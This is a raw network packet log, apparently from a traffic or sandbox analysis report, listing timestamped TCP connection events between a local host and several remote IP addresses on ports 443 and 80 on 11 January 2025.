                                                                                                                                                                  Jan 11, 2025 07:54:37.845065117 CET4435999768.67.160.186192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:37.845330000 CET59997443192.168.11.2068.67.160.186
                                                                                                                                                                  Jan 11, 2025 07:54:37.845938921 CET59997443192.168.11.2068.67.160.186
                                                                                                                                                                  Jan 11, 2025 07:54:37.845968962 CET4435999768.67.160.186192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:37.846198082 CET49420443192.168.11.2068.67.160.186
                                                                                                                                                                  Jan 11, 2025 07:54:37.846239090 CET4434942068.67.160.186192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:37.846499920 CET49420443192.168.11.2068.67.160.186
                                                                                                                                                                  Jan 11, 2025 07:54:37.846839905 CET49420443192.168.11.2068.67.160.186
                                                                                                                                                                  Jan 11, 2025 07:54:37.846863985 CET4434942068.67.160.186192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:38.053380013 CET53258443192.168.11.2013.89.179.10
                                                                                                                                                                  Jan 11, 2025 07:54:38.053392887 CET4435325813.89.179.10192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:38.053627968 CET53258443192.168.11.2013.89.179.10
                                                                                                                                                                  Jan 11, 2025 07:54:38.053777933 CET53258443192.168.11.2013.89.179.10
                                                                                                                                                                  Jan 11, 2025 07:54:38.053783894 CET4435325813.89.179.10192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:38.058326006 CET50559443192.168.11.2013.89.179.10
                                                                                                                                                                  Jan 11, 2025 07:54:38.058342934 CET4435055913.89.179.10192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:38.058506966 CET50559443192.168.11.2013.89.179.10
                                                                                                                                                                  Jan 11, 2025 07:54:38.058655977 CET50559443192.168.11.2013.89.179.10
                                                                                                                                                                  Jan 11, 2025 07:54:38.058669090 CET4435055913.89.179.10192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:38.116934061 CET4434942068.67.160.186192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:38.117314100 CET49420443192.168.11.2068.67.160.186
                                                                                                                                                                  Jan 11, 2025 07:54:38.117321968 CET4434942068.67.160.186192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:38.117687941 CET4434942068.67.160.186192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:38.118108988 CET49420443192.168.11.2068.67.160.186
                                                                                                                                                                  Jan 11, 2025 07:54:38.118154049 CET49420443192.168.11.2068.67.160.186
                                                                                                                                                                  Jan 11, 2025 07:54:38.118156910 CET4434942068.67.160.186192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:38.118221045 CET4434942068.67.160.186192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:38.158555031 CET49420443192.168.11.2068.67.160.186
                                                                                                                                                                  Jan 11, 2025 07:54:38.331423998 CET62453443192.168.11.2013.89.179.10
                                                                                                                                                                  Jan 11, 2025 07:54:38.331445932 CET4436245313.89.179.10192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:38.331615925 CET62453443192.168.11.2013.89.179.10
                                                                                                                                                                  Jan 11, 2025 07:54:38.331752062 CET62453443192.168.11.2013.89.179.10
                                                                                                                                                                  Jan 11, 2025 07:54:38.331764936 CET4436245313.89.179.10192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:38.429270983 CET4434942068.67.160.186192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:38.429354906 CET4434942068.67.160.186192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:38.429565907 CET49420443192.168.11.2068.67.160.186
                                                                                                                                                                  Jan 11, 2025 07:54:38.429970026 CET49420443192.168.11.2068.67.160.186
                                                                                                                                                                  Jan 11, 2025 07:54:38.429970026 CET49420443192.168.11.2068.67.160.186
                                                                                                                                                                  Jan 11, 2025 07:54:38.429981947 CET4434942068.67.160.186192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:38.430154085 CET49420443192.168.11.2068.67.160.186
                                                                                                                                                                  Jan 11, 2025 07:54:38.430284977 CET64889443192.168.11.2068.67.160.186
                                                                                                                                                                  Jan 11, 2025 07:54:38.430299044 CET4436488968.67.160.186192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:38.430500984 CET64889443192.168.11.2068.67.160.186
                                                                                                                                                                  Jan 11, 2025 07:54:38.430640936 CET64889443192.168.11.2068.67.160.186
                                                                                                                                                                  Jan 11, 2025 07:54:38.430646896 CET4436488968.67.160.186192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:38.458518028 CET4435055913.89.179.10192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:38.458874941 CET50559443192.168.11.2013.89.179.10
                                                                                                                                                                  Jan 11, 2025 07:54:38.458885908 CET4435055913.89.179.10192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:38.459254980 CET4435055913.89.179.10192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:38.459614038 CET50559443192.168.11.2013.89.179.10
                                                                                                                                                                  Jan 11, 2025 07:54:38.459683895 CET4435055913.89.179.10192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:38.459717989 CET50559443192.168.11.2013.89.179.10
                                                                                                                                                                  Jan 11, 2025 07:54:38.459717989 CET50559443192.168.11.2013.89.179.10
                                                                                                                                                                  Jan 11, 2025 07:54:38.459775925 CET4435055913.89.179.10192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:38.459795952 CET50559443192.168.11.2013.89.179.10
                                                                                                                                                                  Jan 11, 2025 07:54:38.459813118 CET50559443192.168.11.2013.89.179.10
                                                                                                                                                                  Jan 11, 2025 07:54:38.459815025 CET4435055913.89.179.10192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:38.459821939 CET4435055913.89.179.10192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:38.460010052 CET50559443192.168.11.2013.89.179.10
                                                                                                                                                                  Jan 11, 2025 07:54:38.460031033 CET4435055913.89.179.10192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:38.482615948 CET4435325813.89.179.10192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:38.483027935 CET53258443192.168.11.2013.89.179.10
                                                                                                                                                                  Jan 11, 2025 07:54:38.483055115 CET4435325813.89.179.10192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:38.483818054 CET4435325813.89.179.10192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:38.484178066 CET53258443192.168.11.2013.89.179.10
                                                                                                                                                                  Jan 11, 2025 07:54:38.484246969 CET53258443192.168.11.2013.89.179.10
                                                                                                                                                                  Jan 11, 2025 07:54:38.484257936 CET4435325813.89.179.10192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:38.484301090 CET53258443192.168.11.2013.89.179.10
                                                                                                                                                                  Jan 11, 2025 07:54:38.484347105 CET53258443192.168.11.2013.89.179.10
                                                                                                                                                                  Jan 11, 2025 07:54:38.484345913 CET4435325813.89.179.10192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:38.484405994 CET4435325813.89.179.10192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:38.533581972 CET53258443192.168.11.2013.89.179.10
                                                                                                                                                                  Jan 11, 2025 07:54:38.700886011 CET4436488968.67.160.186192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:38.701190948 CET64889443192.168.11.2068.67.160.186
                                                                                                                                                                  Jan 11, 2025 07:54:38.701215029 CET4436488968.67.160.186192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:38.701987982 CET4436488968.67.160.186192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:38.702405930 CET64889443192.168.11.2068.67.160.186
                                                                                                                                                                  Jan 11, 2025 07:54:38.702469110 CET64889443192.168.11.2068.67.160.186
                                                                                                                                                                  Jan 11, 2025 07:54:38.702486038 CET4436488968.67.160.186192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:38.702636957 CET4436488968.67.160.186192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:38.722110033 CET4435055913.89.179.10192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:38.722223043 CET4435055913.89.179.10192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:38.722383976 CET50559443192.168.11.2013.89.179.10
                                                                                                                                                                  Jan 11, 2025 07:54:38.722526073 CET50559443192.168.11.2013.89.179.10
                                                                                                                                                                  Jan 11, 2025 07:54:38.722526073 CET50559443192.168.11.2013.89.179.10
                                                                                                                                                                  Jan 11, 2025 07:54:38.722556114 CET4435055913.89.179.10192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:38.722795963 CET50559443192.168.11.2013.89.179.10
                                                                                                                                                                  Jan 11, 2025 07:54:38.722887039 CET53348443192.168.11.2013.89.179.10
                                                                                                                                                                  Jan 11, 2025 07:54:38.722923994 CET4435334813.89.179.10192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:38.723104000 CET53348443192.168.11.2013.89.179.10
                                                                                                                                                                  Jan 11, 2025 07:54:38.723253965 CET53348443192.168.11.2013.89.179.10
                                                                                                                                                                  Jan 11, 2025 07:54:38.723265886 CET4435334813.89.179.10192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:38.750188112 CET64889443192.168.11.2068.67.160.186
                                                                                                                                                                  Jan 11, 2025 07:54:38.765547991 CET4436245313.89.179.10192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:38.765903950 CET62453443192.168.11.2013.89.179.10
                                                                                                                                                                  Jan 11, 2025 07:54:38.765930891 CET4436245313.89.179.10192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:38.768013000 CET4436245313.89.179.10192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:38.768220901 CET62453443192.168.11.2013.89.179.10
                                                                                                                                                                  Jan 11, 2025 07:54:38.768479109 CET62453443192.168.11.2013.89.179.10
                                                                                                                                                                  Jan 11, 2025 07:54:38.768580914 CET62453443192.168.11.2013.89.179.10
                                                                                                                                                                  Jan 11, 2025 07:54:38.768580914 CET62453443192.168.11.2013.89.179.10
                                                                                                                                                                  Jan 11, 2025 07:54:38.768608093 CET4436245313.89.179.10192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:38.768629074 CET62453443192.168.11.2013.89.179.10
                                                                                                                                                                  Jan 11, 2025 07:54:38.768686056 CET4436245313.89.179.10192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:38.768701077 CET62453443192.168.11.2013.89.179.10
                                                                                                                                                                  Jan 11, 2025 07:54:38.768800020 CET4436245313.89.179.10192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:38.768847942 CET62453443192.168.11.2013.89.179.10
                                                                                                                                                                  Jan 11, 2025 07:54:38.769030094 CET62453443192.168.11.2013.89.179.10
                                                                                                                                                                  Jan 11, 2025 07:54:38.769051075 CET4436245313.89.179.10192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:38.769257069 CET62453443192.168.11.2013.89.179.10
                                                                                                                                                                  Jan 11, 2025 07:54:38.769284964 CET4436245313.89.179.10192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:38.787935972 CET4435325813.89.179.10192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:38.788064957 CET4435325813.89.179.10192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:38.788193941 CET53258443192.168.11.2013.89.179.10
                                                                                                                                                                  Jan 11, 2025 07:54:38.788549900 CET53258443192.168.11.2013.89.179.10
                                                                                                                                                                  Jan 11, 2025 07:54:38.788578033 CET4435325813.89.179.10192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:38.812850952 CET62453443192.168.11.2013.89.179.10
                                                                                                                                                                  Jan 11, 2025 07:54:39.016504049 CET4436488968.67.160.186192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:39.016582012 CET4436488968.67.160.186192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:39.016725063 CET64889443192.168.11.2068.67.160.186
                                                                                                                                                                  Jan 11, 2025 07:54:39.017234087 CET64889443192.168.11.2068.67.160.186
                                                                                                                                                                  Jan 11, 2025 07:54:39.017256021 CET4436488968.67.160.186192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:39.050718069 CET4436245313.89.179.10192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:39.050793886 CET4436245313.89.179.10192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:39.050985098 CET62453443192.168.11.2013.89.179.10
                                                                                                                                                                  Jan 11, 2025 07:54:39.051209927 CET62453443192.168.11.2013.89.179.10
                                                                                                                                                                  Jan 11, 2025 07:54:39.051228046 CET4436245313.89.179.10192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:39.158538103 CET4435334813.89.179.10192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:39.158909082 CET53348443192.168.11.2013.89.179.10
                                                                                                                                                                  Jan 11, 2025 07:54:39.158931971 CET4435334813.89.179.10192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:39.159688950 CET4435334813.89.179.10192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:39.160130978 CET53348443192.168.11.2013.89.179.10
                                                                                                                                                                  Jan 11, 2025 07:54:39.160196066 CET53348443192.168.11.2013.89.179.10
                                                                                                                                                                  Jan 11, 2025 07:54:39.160196066 CET53348443192.168.11.2013.89.179.10
                                                                                                                                                                  Jan 11, 2025 07:54:39.160206079 CET4435334813.89.179.10192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:39.160244942 CET53348443192.168.11.2013.89.179.10
                                                                                                                                                                  Jan 11, 2025 07:54:39.160284042 CET4435334813.89.179.10192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:39.160293102 CET53348443192.168.11.2013.89.179.10
                                                                                                                                                                  Jan 11, 2025 07:54:39.160471916 CET53348443192.168.11.2013.89.179.10
                                                                                                                                                                  Jan 11, 2025 07:54:39.160478115 CET4435334813.89.179.10192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:39.213793993 CET53348443192.168.11.2013.89.179.10
                                                                                                                                                                  Jan 11, 2025 07:54:39.322475910 CET4976980192.168.11.2094.23.158.211
                                                                                                                                                                  Jan 11, 2025 07:54:39.450021029 CET4435334813.89.179.10192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:39.450162888 CET4435334813.89.179.10192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:39.450340986 CET53348443192.168.11.2013.89.179.10
                                                                                                                                                                  Jan 11, 2025 07:54:39.450666904 CET53348443192.168.11.2013.89.179.10
                                                                                                                                                                  Jan 11, 2025 07:54:39.450706005 CET4435334813.89.179.10192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:39.889883041 CET60768443192.168.11.2013.89.179.10
                                                                                                                                                                  Jan 11, 2025 07:54:39.889940023 CET4436076813.89.179.10192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:39.890125036 CET60768443192.168.11.2013.89.179.10
                                                                                                                                                                  Jan 11, 2025 07:54:39.890233994 CET60768443192.168.11.2013.89.179.10
                                                                                                                                                                  Jan 11, 2025 07:54:39.890265942 CET4436076813.89.179.10192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:40.289899111 CET4436076813.89.179.10192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:40.290222883 CET60768443192.168.11.2013.89.179.10
                                                                                                                                                                  Jan 11, 2025 07:54:40.290235996 CET4436076813.89.179.10192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:40.290671110 CET4436076813.89.179.10192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:40.291102886 CET60768443192.168.11.2013.89.179.10
                                                                                                                                                                  Jan 11, 2025 07:54:40.291209936 CET4436076813.89.179.10192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:40.291214943 CET60768443192.168.11.2013.89.179.10
                                                                                                                                                                  Jan 11, 2025 07:54:40.291214943 CET60768443192.168.11.2013.89.179.10
                                                                                                                                                                  Jan 11, 2025 07:54:40.291254997 CET4436076813.89.179.10192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:40.291270971 CET60768443192.168.11.2013.89.179.10
                                                                                                                                                                  Jan 11, 2025 07:54:40.291306019 CET4436076813.89.179.10192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:40.291338921 CET60768443192.168.11.2013.89.179.10
                                                                                                                                                                  Jan 11, 2025 07:54:40.291537046 CET60768443192.168.11.2013.89.179.10
                                                                                                                                                                  Jan 11, 2025 07:54:40.334258080 CET4436076813.89.179.10192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:40.352118015 CET50713443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:40.352138996 CET44350713204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:40.352370024 CET50713443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:40.352475882 CET50713443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:40.352483988 CET44350713204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:40.597532988 CET4436076813.89.179.10192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:40.597666025 CET4436076813.89.179.10192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:40.597839117 CET60768443192.168.11.2013.89.179.10
                                                                                                                                                                  Jan 11, 2025 07:54:40.598016024 CET60768443192.168.11.2013.89.179.10
                                                                                                                                                                  Jan 11, 2025 07:54:40.598050117 CET4436076813.89.179.10192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:40.727550030 CET44350713204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:40.728127956 CET50713443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:40.728159904 CET44350713204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:40.729041100 CET44350713204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:40.731137991 CET50713443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:40.731307030 CET50713443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:40.731334925 CET44350713204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:40.731383085 CET44350713204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:40.779650927 CET50713443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:40.990313053 CET44350713204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:40.990453959 CET44350713204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:40.990643024 CET50713443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:40.990869045 CET50713443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:40.990869045 CET50713443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:40.990904093 CET44350713204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:40.991131067 CET50713443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:43.368179083 CET56798443192.168.11.2013.89.179.10
                                                                                                                                                                  Jan 11, 2025 07:54:43.368192911 CET4435679813.89.179.10192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:43.368385077 CET56798443192.168.11.2013.89.179.10
                                                                                                                                                                  Jan 11, 2025 07:54:43.368581057 CET56798443192.168.11.2013.89.179.10
                                                                                                                                                                  Jan 11, 2025 07:54:43.368590117 CET4435679813.89.179.10192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:43.793215036 CET4435679813.89.179.10192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:43.793569088 CET56798443192.168.11.2013.89.179.10
                                                                                                                                                                  Jan 11, 2025 07:54:43.793580055 CET4435679813.89.179.10192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:43.793879986 CET4435679813.89.179.10192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:43.794344902 CET56798443192.168.11.2013.89.179.10
                                                                                                                                                                  Jan 11, 2025 07:54:43.794397116 CET4435679813.89.179.10192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:43.794477940 CET56798443192.168.11.2013.89.179.10
                                                                                                                                                                  Jan 11, 2025 07:54:43.794477940 CET56798443192.168.11.2013.89.179.10
                                                                                                                                                                  Jan 11, 2025 07:54:43.794493914 CET4435679813.89.179.10192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:43.794534922 CET56798443192.168.11.2013.89.179.10
                                                                                                                                                                  Jan 11, 2025 07:54:43.794548988 CET56798443192.168.11.2013.89.179.10
                                                                                                                                                                  Jan 11, 2025 07:54:43.794552088 CET4435679813.89.179.10192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:43.794744015 CET56798443192.168.11.2013.89.179.10
                                                                                                                                                                  Jan 11, 2025 07:54:43.794751883 CET4435679813.89.179.10192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:43.794935942 CET56798443192.168.11.2013.89.179.10
                                                                                                                                                                  Jan 11, 2025 07:54:43.794950962 CET4435679813.89.179.10192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:44.084672928 CET4435679813.89.179.10192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:44.084765911 CET4435679813.89.179.10192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:44.084994078 CET56798443192.168.11.2013.89.179.10
                                                                                                                                                                  Jan 11, 2025 07:54:44.085180044 CET56798443192.168.11.2013.89.179.10
                                                                                                                                                                  Jan 11, 2025 07:54:44.085180044 CET56798443192.168.11.2013.89.179.10
                                                                                                                                                                  Jan 11, 2025 07:54:44.085191011 CET4435679813.89.179.10192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:44.085362911 CET56798443192.168.11.2013.89.179.10
                                                                                                                                                                  Jan 11, 2025 07:54:45.451977968 CET5679980192.168.11.2094.23.158.211
                                                                                                                                                                  Jan 11, 2025 07:54:45.881611109 CET58227443192.168.11.2013.89.179.10
                                                                                                                                                                  Jan 11, 2025 07:54:45.881628990 CET4435822713.89.179.10192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:45.881788015 CET58227443192.168.11.2013.89.179.10
                                                                                                                                                                  Jan 11, 2025 07:54:45.881975889 CET58227443192.168.11.2013.89.179.10
                                                                                                                                                                  Jan 11, 2025 07:54:45.881988049 CET4435822713.89.179.10192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:46.282419920 CET4435822713.89.179.10192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:46.282829046 CET58227443192.168.11.2013.89.179.10
                                                                                                                                                                  Jan 11, 2025 07:54:46.282860041 CET4435822713.89.179.10192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:46.283791065 CET4435822713.89.179.10192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:46.284286022 CET58227443192.168.11.2013.89.179.10
                                                                                                                                                                  Jan 11, 2025 07:54:46.284388065 CET58227443192.168.11.2013.89.179.10
                                                                                                                                                                  Jan 11, 2025 07:54:46.284388065 CET58227443192.168.11.2013.89.179.10
                                                                                                                                                                  Jan 11, 2025 07:54:46.284419060 CET4435822713.89.179.10192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:46.284451008 CET58227443192.168.11.2013.89.179.10
                                                                                                                                                                  Jan 11, 2025 07:54:46.284523964 CET58227443192.168.11.2013.89.179.10
                                                                                                                                                                  Jan 11, 2025 07:54:46.284528017 CET4435822713.89.179.10192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:46.284687996 CET58227443192.168.11.2013.89.179.10
                                                                                                                                                                  Jan 11, 2025 07:54:46.284715891 CET4435822713.89.179.10192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:46.338078022 CET58227443192.168.11.2013.89.179.10
                                                                                                                                                                  Jan 11, 2025 07:54:46.393939972 CET44363290162.159.61.3192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:46.393980980 CET44363290162.159.61.3192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:46.394294977 CET63290443192.168.11.20162.159.61.3
                                                                                                                                                                  Jan 11, 2025 07:54:46.462812901 CET5679980192.168.11.2094.23.158.211
                                                                                                                                                                  Jan 11, 2025 07:54:46.468997955 CET44353302162.159.61.3192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:46.469068050 CET44353302162.159.61.3192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:46.469290018 CET53302443192.168.11.20162.159.61.3
                                                                                                                                                                  Jan 11, 2025 07:54:46.541214943 CET4435822713.89.179.10192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:46.541312933 CET4435822713.89.179.10192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:46.541505098 CET58227443192.168.11.2013.89.179.10
                                                                                                                                                                  Jan 11, 2025 07:54:46.541853905 CET58227443192.168.11.2013.89.179.10
                                                                                                                                                                  Jan 11, 2025 07:54:46.541882992 CET4435822713.89.179.10192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:46.648998022 CET4976780192.168.11.20160.202.165.71
                                                                                                                                                                  Jan 11, 2025 07:54:46.767461061 CET8049767160.202.165.71192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:48.475580931 CET5679980192.168.11.2094.23.158.211
                                                                                                                                                                  Jan 11, 2025 07:54:48.889319897 CET63290443192.168.11.20162.159.61.3
                                                                                                                                                                  Jan 11, 2025 07:54:48.889332056 CET44363290162.159.61.3192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:48.889451027 CET50590443192.168.11.2013.89.179.10
                                                                                                                                                                  Jan 11, 2025 07:54:48.889467001 CET4435059013.89.179.10192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:48.889735937 CET50590443192.168.11.2013.89.179.10
                                                                                                                                                                  Jan 11, 2025 07:54:48.889926910 CET50590443192.168.11.2013.89.179.10
                                                                                                                                                                  Jan 11, 2025 07:54:48.889933109 CET4435059013.89.179.10192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:49.351712942 CET4435059013.89.179.10192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:49.352103949 CET50590443192.168.11.2013.89.179.10
                                                                                                                                                                  Jan 11, 2025 07:54:49.352119923 CET4435059013.89.179.10192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:49.352499962 CET4435059013.89.179.10192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:49.352896929 CET50590443192.168.11.2013.89.179.10
                                                                                                                                                                  Jan 11, 2025 07:54:49.352988958 CET4435059013.89.179.10192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:49.353049040 CET50590443192.168.11.2013.89.179.10
                                                                                                                                                                  Jan 11, 2025 07:54:49.353049040 CET50590443192.168.11.2013.89.179.10
                                                                                                                                                                  Jan 11, 2025 07:54:49.353070021 CET50590443192.168.11.2013.89.179.10
                                                                                                                                                                  Jan 11, 2025 07:54:49.353116989 CET4435059013.89.179.10192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:49.353142023 CET50590443192.168.11.2013.89.179.10
                                                                                                                                                                  Jan 11, 2025 07:54:49.353157043 CET4435059013.89.179.10192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:49.353300095 CET50590443192.168.11.2013.89.179.10
                                                                                                                                                                  Jan 11, 2025 07:54:49.394207001 CET4435059013.89.179.10192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:49.406537056 CET50590443192.168.11.2013.89.179.10
                                                                                                                                                                  Jan 11, 2025 07:54:49.424690962 CET4435237123.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:49.424729109 CET4435237123.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:49.424985886 CET52371443192.168.11.2023.45.46.202
                                                                                                                                                                  Jan 11, 2025 07:54:49.437690973 CET52371443192.168.11.2023.45.46.202
                                                                                                                                                                  Jan 11, 2025 07:54:49.437721014 CET4435237123.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:49.437947989 CET60513443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:49.437997103 CET44360513204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:49.438189983 CET60513443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:49.438251972 CET60513443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:49.438270092 CET44360513204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:49.805181026 CET44360513204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:49.805622101 CET60513443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:49.805641890 CET44360513204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:49.806293964 CET44360513204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:49.806813955 CET60513443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:49.806920052 CET60513443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:49.806931019 CET44360513204.79.197.203192.168.11.20
